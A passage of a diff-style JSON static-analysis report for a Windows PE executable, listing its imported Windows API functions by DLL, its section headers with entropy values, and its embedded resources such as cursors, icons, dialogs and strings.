"GetTopWindow" + }, + { + "address": "0x486570", + "name": "DestroyWindow" + }, + { + "address": "0x486574", + "name": "GetWindowRect" + }, + { + "address": "0x486578", + "name": "GetParent" + }, + { + "address": "0x48657c", + "name": "EnableWindow" + }, + { + "address": "0x486580", + "name": "SendMessageA" + }, + { + "address": "0x486584", + "name": "MoveWindow" + }, + { + "address": "0x486588", + "name": "ShowWindow" + }, + { + "address": "0x48658c", + "name": "RedrawWindow" + }, + { + "address": "0x486590", + "name": "GetWindowLongA" + }, + { + "address": "0x486594", + "name": "EnumChildWindows" + }, + { + "address": "0x486598", + "name": "IsWindow" + }, + { + "address": "0x48659c", + "name": "DrawIcon" + }, + { + "address": "0x4865a0", + "name": "IsIconic" + }, + { + "address": "0x4865a4", + "name": "GetClientRect" + }, + { + "address": "0x4865a8", + "name": "LoadIconA" + }, + { + "address": "0x4865ac", + "name": "UnhookWindowsHookEx" + }, + { + "address": "0x4865b0", + "name": "GetMessageTime" + }, + { + "address": "0x4865b4", + "name": "GetMessagePos" + }, + { + "address": "0x4865b8", + "name": "PeekMessageA" + }, + { + "address": "0x4865bc", + "name": "MapWindowPoints" + }, + { + "address": "0x4865c0", + "name": "ScrollWindow" + }, + { + "address": "0x4865c4", + "name": "MessageBoxA" + }, + { + "address": "0x4865c8", + "name": "TrackPopupMenuEx" + }, + { + "address": "0x4865cc", + "name": "TrackPopupMenu" + }, + { + "address": "0x4865d0", + "name": "GetKeyState" + }, + { + "address": "0x4865d4", + "name": "SetScrollRange" + }, + { + "address": "0x4865d8", + "name": "GetScrollRange" + }, + { + "address": "0x4865dc", + "name": "SetScrollPos" + }, + { + "address": "0x4865e0", + "name": "GetScrollPos" + }, + { + "address": "0x4865e4", + "name": "SetForegroundWindow" + }, + { + "address": "0x4865e8", + "name": "SetRect" + }, + { + "address": "0x4865ec", + "name": "UnionRect" + }, + { + "address": "0x4865f0", + "name": "IsRectEmpty" + }, + { + "address": "0x4865f4", + "name": "MapVirtualKeyA" + }, + { + "address": "0x4865f8", + "name": "GetKeyNameTextA" + }, + { + "address": "0x4865fc", + "name": "ShowScrollBar" + }, + { + "address": "0x486600", + "name": "IsWindowVisible" + }, + { + "address": "0x486604", + "name": "UpdateWindow" + }, + { + "address": "0x486608", + "name": "GetMenu" + }, + { + "address": "0x48660c", + "name": "PostMessageA" + }, + { + "address": "0x486610", + "name": "GetSubMenu" + }, + { + "address": "0x486614", + "name": "GetMenuItemID" + }, + { + "address": "0x486618", + "name": "GetMenuItemCount" + }, + { + "address": "0x48661c", + "name": "GetSysColor" + }, + { + "address": "0x486620", + "name": "AdjustWindowRectEx" + }, + { + "address": "0x486624", + "name": "ScreenToClient" + }, + { + "address": "0x486628", + "name": "EqualRect" + }, + { + "address": "0x48662c", + "name": "LoadMenuA" + }, + { + "address": "0x486630", + "name": "UnpackDDElParam" + }, + { + "address": "0x486634", + "name": "ReuseDDElParam" + }, + { + "address": "0x486638", + "name": "LoadAcceleratorsA" + }, + { + "address": "0x48663c", + "name": "GetDlgItemInt" + }, + { + "address": "0x486640", + "name": "InvalidateRect" + }, + { + "address": "0x486644", + "name": "GetSystemMetrics" + }, + { + "address": "0x486648", + "name": "CharLowerA" + }, + { + "address": "0x48664c", + "name": "CharLowerW" + }, + { + "address": "0x486650", + "name": "CharUpperA" + }, + { + "address": "0x486654", + "name": "CharUpperW" + }, + { + "address": "0x486658", + "name": "GetWindow" + }, + { + "address": "0x48665c", + "name": "PtInRect" + }, + { + "address": "0x486660", + "name": "CopyRect" + }, + { + "address": "0x486664", + "name": "GetWindowPlacement" + }, + { + "address": "0x486668", + "name": "SystemParametersInfoA" + }, + { + "address": "0x48666c", + "name": "IntersectRect" + }, + { + "address": "0x486670", + "name": "OffsetRect" + }, + { + "address": "0x486674", + "name": "SetWindowPos" + }, + { + "address": "0x486678", + "name": "SetWindowLongA" + }, + { + "address": "0x48667c", + "name": "CallWindowProcA" + }, + { + "address": "0x486680", + "name": "DefWindowProcA" + }, + { + "address": "0x486684", + "name": "GetDlgCtrlID" + }, + { + "address": "0x486688", + "name": "SetWindowPlacement" + }, + { + "address": "0x48668c", + "name": "DeferWindowPos" + }, + { + "address": "0x486690", + "name": "GetScrollInfo" + }, + { + "address": "0x486694", + "name": "SetScrollInfo" + }, + { + "address": "0x486698", + "name": "GetClassInfoA" + }, + { + "address": "0x48669c", + "name": "RegisterClassA" + }, + { + "address": "0x4866a0", + "name": "UnregisterClassA" + }, + { + "address": "0x4866a4", + "name": "GetMenuState" + } + ] + }, + "GDI32": { + "dll": "GDI32.dll", + "imports": [ + { + "address": "0x485d78", + "name": "ExtCreatePen" + }, + { + "address": "0x485d7c", + "name": "CreateSolidBrush" + }, + { + "address": "0x485d80", + "name": "CreateHatchBrush" + }, + { + "address": "0x485d84", + "name": "CopyMetaFileA" + }, + { + "address": "0x485d88", + "name": "CreateDCA" + }, + { + "address": "0x485d8c", + "name": "CreateFontIndirectA" + }, + { + "address": "0x485d90", + "name": "GetTextExtentPoint32A" + }, + { + "address": "0x485d94", + "name": "CreateRectRgnIndirect" + }, + { + "address": "0x485d98", + "name": "SetRectRgn" + }, + { + "address": "0x485d9c", + "name": "CombineRgn" + }, + { + "address": "0x485da0", + "name": "GetMapMode" + }, + { + "address": "0x485da4", + "name": "PatBlt" + }, + { + "address": "0x485da8", + "name": "CreatePen" + }, + { + "address": "0x485dac", + "name": "GetTextMetricsA" + }, + { + "address": "0x485db0", + "name": "CreateCompatibleBitmap" + }, + { + "address": "0x485db4", + "name": "StretchDIBits" + }, + { + "address": "0x485db8", + "name": "GetCharWidthA" + }, + { + "address": "0x485dbc", + "name": "CreateFontA" + }, + { + "address": "0x485dc0", + "name": "GetBkColor" + }, + { + "address": "0x485dc4", + "name": "StartPage" + }, + { + "address": "0x485dc8", + "name": "EndPage" + }, + { + "address": "0x485dcc", + "name": "SetAbortProc" + }, + { + "address": "0x485dd0", + "name": "AbortDoc" + }, + { + "address": "0x485dd4", + "name": "EndDoc" + }, + { + "address": "0x485dd8", + "name": "GetDeviceCaps" + }, + { + "address": "0x485ddc", + "name": "PlayMetaFile" + }, + { + "address": "0x485de0", + "name": "EnumMetaFile" + }, + { + "address": "0x485de4", + "name": "GetObjectType" + }, + { + "address": "0x485de8", + "name": "PlayMetaFileRecord" + }, + { + "address": "0x485dec", + "name": "SelectPalette" + }, + { + "address": "0x485df0", + "name": "GetStockObject" + }, + { + "address": "0x485df4", + "name": "CreateCompatibleDC" + }, + { + "address": "0x485df8", + "name": "CreatePatternBrush" + }, + { + "address": "0x485dfc", + "name": "CreateDIBPatternBrushPt" + }, + { + "address": "0x485e00", + "name": "DeleteDC" + }, + { + "address": "0x485e04", + "name": "ExtSelectClipRgn" + }, + { + "address": "0x485e08", + "name": "PolyBezierTo" + }, + { + "address": "0x485e0c", + "name": "PolylineTo" + }, + { + "address": "0x485e10", + "name": "PolyDraw" + }, + { + "address": "0x485e14", + "name": "ArcTo" + }, + { + "address": "0x485e18", + "name": "SelectObject" + }, + { + "address": "0x485e1c", + "name": "GetCurrentPositionEx" + }, + { + "address": "0x485e20", + "name": "ScaleWindowExtEx" + }, + { + "address": "0x485e24", + "name": "SetWindowExtEx" + }, + { + "address": "0x485e28", + "name": "OffsetWindowOrgEx" + }, + { + "address": "0x485e2c", + "name": "SetWindowOrgEx" + }, + { + "address": "0x485e30", + "name": "ScaleViewportExtEx" + }, + { + "address": "0x485e34", + "name": "SetViewportExtEx" + }, + { + "address": "0x485e38", + "name": "OffsetViewportOrgEx" + }, + { + "address": "0x485e3c", + "name": "DPtoLP" + }, + { + "address": "0x485e40", + "name": "GetDCOrgEx" + }, + { + "address": "0x485e44", + "name": "Escape" + }, + { + "address": "0x485e48", + "name": "ExtTextOutA" + }, + { + "address": "0x485e4c", + "name": "TextOutA" + }, + { + "address": "0x485e50", + "name": "RectVisible" + }, + { + "address": "0x485e54", + "name": "PtVisible" + }, + { + "address": "0x485e58", + "name": "StartDocA" + }, + { + "address": "0x485e5c", + "name": "GetPixel" + }, + { + "address": "0x485e60", + "name": "BitBlt" + }, + { + "address": "0x485e64", + "name": "GetWindowExtEx" + }, + { + "address": "0x485e68", + "name": "GetViewportExtEx" + }, + { + "address": "0x485e6c", + "name": "SelectClipPath" + }, + { + "address": "0x485e70", + "name": "CreateRectRgn" + }, + { + "address": "0x485e74", + "name": "GetClipRgn" + }, + { + "address": "0x485e78", + "name": "SelectClipRgn" + }, + { + "address": "0x485e7c", + "name": "DeleteObject" + }, + { + "address": "0x485e80", + "name": "SetColorAdjustment" + }, + { + "address": "0x485e84", + "name": "SetArcDirection" + }, + { + "address": "0x485e88", + "name": "SetMapperFlags" + }, + { + "address": "0x485e8c", + "name": "SetTextCharacterExtra" + }, + { + "address": "0x485e90", + "name": "SetTextJustification" + }, + { + "address": "0x485e94", + "name": "SetTextAlign" + }, + { + "address": "0x485e98", + "name": "MoveToEx" + }, + { + "address": "0x485e9c", + "name": "LineTo" + }, + { + "address": "0x485ea0", + "name": "OffsetClipRgn" + }, + { + "address": "0x485ea4", + "name": "IntersectClipRect" + }, + { + "address": "0x485ea8", + "name": "ExcludeClipRect" + }, + { + "address": "0x485eac", + "name": "SetMapMode" + }, + { + "address": "0x485eb0", + "name": "SetStretchBltMode" + }, + { + "address": "0x485eb4", + "name": "SetROP2" + }, + { + "address": "0x485eb8", + "name": "SetPolyFillMode" + }, + { + "address": "0x485ebc", + "name": "SetBkMode" + }, + { + "address": "0x485ec0", + "name": "RestoreDC" + }, + { + "address": "0x485ec4", + "name": "SaveDC" + }, + { + "address": "0x485ec8", + "name": "CreateBitmap" + }, + { + "address": "0x485ecc", + "name": "GetObjectA" + }, + { + "address": "0x485ed0", + "name": "SetBkColor" + }, + { + "address": "0x485ed4", + "name": "SetTextColor" + }, + { + "address": "0x485ed8", + "name": "GetClipBox" + }, + { + "address": "0x485edc", + "name": "SetViewportOrgEx" + } + ] + }, + "comdlg32": { + "dll": "comdlg32.dll", + "imports": [ + { + "address": "0x48679c", + "name": "PageSetupDlgA" + }, + { + "address": "0x4867a0", + "name": "FindTextA" + }, + { + "address": "0x4867a4", + "name": "ReplaceTextA" + }, + { + "address": "0x4867a8", + "name": "GetOpenFileNameA" + }, + { + "address": "0x4867ac", + "name": "GetSaveFileNameA" + }, + { + "address": "0x4867b0", + "name": "CommDlgExtendedError" + }, + { + "address": "0x4867b4", + "name": "PrintDlgA" + }, + { + "address": "0x4867b8", + "name": "GetFileTitleA" + } + ] + }, + "WINSPOOL": { + "dll": "WINSPOOL.DRV", + "imports": [ + { + "address": "0x486760", + "name": "GetJobA" + }, + { + "address": "0x486764", + "name": "OpenPrinterA" + }, + { + "address": "0x486768", + "name": "DocumentPropertiesA" + }, + { + "address": "0x48676c", + "name": "ClosePrinter" + } + ] + }, + "ADVAPI32": { + "dll": "ADVAPI32.dll", + "imports": [ + { + "address": "0x485cac", + "name": "SetFileSecurityA" + }, + { + "address": "0x485cb0", + "name": "RegQueryValueExA" + }, + { + "address": "0x485cb4", + "name": "RegOpenKeyExA" + }, + { + "address": "0x485cb8", + "name": "RegDeleteKeyA" + }, + { + "address": "0x485cbc", + "name": "RegEnumKeyA" + }, + { + "address": "0x485cc0", + "name": "RegOpenKeyA" + }, + { + "address": "0x485cc4", + "name": "RegQueryValueA" + }, + { + "address": "0x485cc8", + "name": "RegSetValueA" + }, + { + "address": "0x485ccc", + "name": "RegCreateKeyExA" + }, + { + "address": "0x485cd0", + "name": "RegSetValueExA" + }, + { + "address": "0x485cd4", + "name": "RegDeleteValueA" + }, + { + "address": "0x485cd8", + "name": "GetFileSecurityA" + }, + { + "address": "0x485cdc", + "name": "RegCloseKey" + }, + { + "address": "0x485ce0", + "name": "RegCreateKeyA" + } + ] + }, + "SHELL32": { + "dll": "SHELL32.dll", + "imports": [ + { + "address": "0x486368", + "name": "SHGetFileInfoA" + }, + { + "address": "0x48636c", + "name": "DragFinish" + }, + { + "address": "0x486370", + "name": "DragQueryFileA" + }, + { + "address": "0x486374", + "name": "ExtractIconA" + } + ] + }, + "COMCTL32": { + "dll": "COMCTL32.dll", + "imports": [ + { + "address": "0x485d1c", + "name": "ImageList_Draw" + }, + { + "address": "0x485d20", + "name": "ImageList_GetImageInfo" + }, + { + "address": "0x485d28", + "name": "ImageList_Read" + }, + { + "address": "0x485d2c", + "name": "ImageList_Write" + }, + { + "address": "0x485d34", + "name": "ImageList_Destroy" + }, + { + "address": "0x485d38", + "name": "ImageList_Create" + }, + { + "address": "0x485d3c", + "name": "ImageList_LoadImageA" + }, + { + "address": "0x485d40", + "name": "ImageList_Merge" + } + ] + }, + "SHLWAPI": { + "dll": "SHLWAPI.dll", + "imports": [ + { + "address": "0x4863a4", + "name": "PathRemoveExtensionA" + }, + { + "address": "0x4863a8", + "name": "PathFindFileNameA" + }, + { + "address": "0x4863ac", + "name": "PathStripToRootA" + }, + { + "address": "0x4863b0", + "name": "PathFindExtensionA" + }, + { + "address": "0x4863b4", + "name": "PathIsUNCA" + } + ] + }, + "ole32": { + "dll": "ole32.dll", + "imports": [ + { + "address": "0x4867ec", + "name": "WriteFmtUserTypeStg" + }, + { + "address": "0x4867f0", + "name": "WriteClassStg" + }, + { + "address": "0x4867f4", + "name": "CoTaskMemFree" + }, + { + "address": "0x4867f8", + "name": "OleRegGetUserType" + }, + { + "address": "0x4867fc", + "name": "ReadFmtUserTypeStg" + }, + { + "address": "0x486800", + "name": "ReadClassStg" + }, + { + "address": "0x486804", + "name": "StringFromCLSID" + }, + { + "address": "0x486808", + "name": "CoTreatAsClass" + }, + { + "address": "0x48680c", + "name": "CreateBindCtx" + }, + { + "address": "0x486810", + "name": "CoTaskMemAlloc" + }, + { + "address": "0x486814", + "name": "ReleaseStgMedium" + }, + { + "address": "0x486818", + "name": "OleDuplicateData" + }, + { + "address": "0x48681c", + "name": "CoDisconnectObject" + }, + { + "address": "0x486820", + "name": "CoCreateInstance" + }, + { + "address": "0x486824", + "name": "StringFromGUID2" + }, + { + "address": "0x486828", + "name": "CLSIDFromString" + }, + { + "address": "0x48682c", + "name": "SetConvertStg" + } + ] + }, + "OLEAUT32": { + "dll": "OLEAUT32.dll", + "imports": [ + { + "address": "0x486288", + "name": "VariantClear" + }, + { + "address": "0x48628c", + "name": "VariantChangeType" + }, + { + "address": "0x486290", + "name": "VariantInit" + }, + { + "address": "0x486294", + "name": "SysAllocStringLen" + }, + { + "address": "0x486298", + "name": "SysFreeString" + }, + { + "address": "0x48629c", + "name": "SysStringLen" + }, + { + "address": "0x4862a0", + "name": "SysAllocStringByteLen" + }, + { + "address": "0x4862a4", + "name": "SysStringByteLen" + }, + { + "address": "0x4862a8", + "name": "SafeArrayUnaccessData" + }, + { + "address": "0x4862ac", + "name": "SafeArrayAccessData" + }, + { + "address": "0x4862b0", + "name": "SafeArrayGetUBound" + }, + { + "address": "0x4862b4", + "name": "SafeArrayGetLBound" + }, + { + "address": "0x4862b8", + "name": "SafeArrayGetElemsize" + }, + { + "address": "0x4862bc", + "name": "SafeArrayGetDim" + }, + { + "address": "0x4862c0", + "name": "SafeArrayCreate" + }, + { + "address": "0x4862c4", + "name": "SafeArrayRedim" + }, + { + "address": "0x4862c8", + "name": "VariantCopy" + }, + { + "address": "0x4862cc", + "name": "SafeArrayAllocData" + }, + { + "address": "0x4862d0", + "name": "SafeArrayAllocDescriptor" + }, + { + "address": "0x4862d4", + "name": "SafeArrayCopy" + }, + { + "address": "0x4862d8", + "name": "SafeArrayGetElement" + }, + { + "address": "0x4862dc", + "name": "SafeArrayPtrOfIndex" + }, + { + "address": "0x4862e0", + "name": "SafeArrayPutElement" + }, + { + "address": "0x4862e4", + "name": "SafeArrayLock" + }, + { + "address": "0x4862e8", + "name": "SafeArrayUnlock" + }, + { + "address": "0x4862ec", + "name": "SafeArrayDestroy" + }, + { + "address": "0x4862f0", + "name": "SafeArrayDestroyData" + }, + { + "address": "0x4862f4", + "name": "SafeArrayDestroyDescriptor" + }, + { + "address": "0x4862f8", + "name": "VariantTimeToSystemTime" + }, + { + "address": "0x4862fc", + "name": "SystemTimeToVariantTime" + }, + { + "address": "0x486300", + "name": "SysAllocString" + }, + { + "address": "0x486304", + "name": "SysReAllocStringLen" + }, + { + "address": "0x486308", + "name": "VarDateFromStr" + }, + { + "address": "0x48630c", + "name": "VarBstrFromDec" + }, + { + "address": "0x486310", + "name": "VarDecFromStr" + }, + { + "address": "0x486314", + "name": "VarCyFromStr" + }, + { + "address": "0x486318", + "name": "VarBstrFromCy" + }, + { + "address": "0x48631c", + "name": "VarBstrFromDate" + } + ] + } + }, + "exported_dll_name": null, + "exports": [], + "dirents": [ + { + "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", + "virtual_address": "0x00085000", + "size": "0x000000f0" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", + "virtual_address": "0x0008a000", + "size": "0x00042cfc" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", + "virtual_address": "0x00068000", + "size": "0x0000001c" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_TLS", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", + "virtual_address": "0x00073630", + "size": "0x00000048" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IAT", + "virtual_address": "0x00085cac", + "size": "0x00000bbc" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", + "virtual_address": "0x00089000", + "size": "0x00000040" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", + "virtual_address": "0x00000000", + "size": "0x00000000" + } + ], + "sections": [ + { + "name": ".text", + "raw_address": "0x00001000", + "virtual_address": "0x00001000", + "virtual_size": "0x00066a62", + "size_of_data": "0x00067000", + "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x60000020", + "entropy": "5.31" + }, + { + "name": ".rdata", + "raw_address": "0x00068000", + "virtual_address": "0x00068000", + "virtual_size": "0x00014830", + "size_of_data": "0x00015000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x40000040", + "entropy": "4.15" + }, + { + "name": ".data", + "raw_address": "0x0007d000", + "virtual_address": "0x0007d000", + "virtual_size": "0x0000746c", + "size_of_data": "0x00004000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "2.58" + }, + { + "name": ".idata", + "raw_address": "0x00081000", + "virtual_address": "0x00085000", + "virtual_size": "0x00003de5", + "size_of_data": "0x00004000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "4.86" + }, + { + "name": ".didat", + "raw_address": "0x00085000", + "virtual_address": "0x00089000", + "virtual_size": "0x00000319", + "size_of_data": "0x00001000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "1.46" + }, + { + "name": ".rsrc", + "raw_address": "0x00086000", + "virtual_address": "0x0008a000", + "virtual_size": "0x00042cfc", + "size_of_data": "0x00043000", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x40000040", + "entropy": "5.02" + } + ], + "overlay": null, + "resources": [ + { + "name": "RT_CURSOR", + "offset": "0x000bee38", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.03" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bef70", + "size": "0x000000b4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.74" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf050", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.34" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf1a0", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.34" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf2f0", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.52" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf440", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.45" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf590", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.35" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf6e0", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.35" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf830", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.35" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bf980", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.31" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bfad0", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.34" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bfc20", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.81" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bfd70", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.81" + }, + { + "name": "RT_CURSOR", + "offset": "0x000bfec0", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.10" + }, + { + "name": "RT_CURSOR", + "offset": "0x000c0010", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "1.97" + }, + { + "name": "RT_CURSOR", + "offset": "0x000c0160", + "size": "0x00000134", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.23" + }, + { + "name": "RT_BITMAP", + "offset": "0x000c0398", + "size": "0x000000b8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.24" + }, + { + "name": "RT_BITMAP", + "offset": "0x000c0450", + "size": "0x00000144", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.88" + }, + { + "name": "RT_ICON", + "offset": "0x0008afa0", + "size": "0x00010828", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "4.94" + }, + { + "name": "RT_ICON", + "offset": "0x0009b7c8", + "size": "0x000094a8", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.22" + }, + { + "name": "RT_ICON", + "offset": "0x000a4c70", + "size": "0x00005488", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.22" + }, + { + "name": "RT_ICON", + "offset": "0x000aa0f8", + "size": "0x00004228", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.15" + }, + { + "name": "RT_ICON", + "offset": "0x000ae320", + "size": "0x000025a8", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.40" + }, + { + "name": "RT_ICON", + "offset": "0x000b08c8", + "size": "0x000010a8", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.49" + }, + { + "name": "RT_ICON", + "offset": "0x000b1970", + "size": "0x00000988", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.67" + }, + { + "name": "RT_ICON", + "offset": "0x000b22f8", + "size": "0x00000468", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.63" + }, + { + "name": "RT_DIALOG", + "offset": "0x000be720", + "size": "0x000003ea", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.21" + }, + { + "name": "RT_DIALOG", + "offset": "0x000c02b0", + "size": "0x000000e8", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.07" + }, + { + "name": "RT_STRING", + "offset": "0x000c0598", + "size": "0x00000082", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.82" + }, + { + "name": "RT_STRING", + "offset": "0x000c0620", + "size": "0x0000002a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "0.96" + }, + { + "name": "RT_STRING", + "offset": "0x000c0650", + "size": "0x00000192", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.09" + }, + { + "name": "RT_STRING", + "offset": "0x000c07e8", + "size": "0x000004e2", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.26" + }, + { + "name": "RT_STRING", + "offset": "0x000c1060", + "size": "0x0000031a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.03" + }, + { + "name": "RT_STRING", + "offset": "0x000c0d80", + "size": "0x000002dc", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.17" + }, + { + "name": "RT_STRING", + "offset": "0x000c1bc0", + "size": "0x0000008a", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.71" + }, + { + "name": "RT_STRING", + "offset": "0x000c0cd0", + "size": "0x000000ac", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.64" + }, + { + "name": "RT_STRING", + "offset": "0x000c1ab0", + "size": "0x000000de", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.88" + }, + { + "name": "RT_STRING", + "offset": "0x000c1380", + "size": "0x000004c4", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.23" + }, + { + "name": "RT_STRING", + "offset": "0x000c1848", + "size": "0x00000264", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "3.09" + }, + { + "name": "RT_STRING", + "offset": "0x000c1b90", + "size": "0x0000002c", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "1.08" + }, + { + "name": "RT_STRING", + "offset": "0x000c1c50", + "size": "0x00000042", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "1.96" + }, + { + "name": "RT_RCDATA", + "offset": "0x000bab20", + "size": "0x00003c00", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "5.70" + }, + { + "name": "RT_RCDATA", + "offset": "0x000b27d8", + "size": "0x00008344", + "filetype": null, + "language": "LANG_RUSSIAN", + "sublanguage": "SUBLANG_RUSSIAN", + "entropy": "7.99" + }, + { + "name": "RT_GROUP_CURSOR", + "offset": "0x000bf028", + "size": "0x00000022", + "filetype": null, + "language": "LANG_ENGLISH", + "sublanguage": "SUBLANG_ENGLISH_US", + "entropy": "2.25" 